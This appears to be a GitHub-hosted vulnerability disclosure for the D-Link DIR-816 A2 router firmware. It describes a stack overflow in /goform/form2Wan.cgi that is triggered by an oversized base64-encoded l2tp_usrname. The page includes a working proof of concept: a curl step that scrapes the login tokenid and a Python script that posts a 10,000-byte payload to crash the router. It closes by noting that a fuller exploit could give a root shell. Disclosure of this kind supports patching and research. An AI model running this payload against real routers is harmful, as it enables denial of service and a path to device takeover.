Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

D-link DIR-816 A2_v1.10CNB04.img Stack overflow vulnerability

Firmware information

Affected version

The picture above shows the latest firmware for this version

Vulnerability details

Vulnerability occurs in /goform/form2Wan.cgi, When wantype is 3, l2tp_usrname will be decrypted by base64, and the result will be stored in v94, which does not check the size of l2tp_usrname, resulting in stack overflow

Poc

The first thing you need to do is to get the tokenid

curl http://192.168.0.1/dir_login.asp | grep tokenid

Then run the following poc

import requests
import base64

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

tokenid = 'xxxx'

url = 'http://192.168.0.1/goform/form2Wan.cgi'

payload = base64.b64encode(b'a' * 10000)

data = {
    'tokenid' : tokenid,
    'wantype' : '3',
    'l2tp_usrname' : payload,
    'l2tp_psword' : payload
}
response = requests.post(url, data=data)
response.encoding="utf-8"
info = response.text
li(url)
print(info)

You can see the router crash, and finally you can write an exp to get a root shell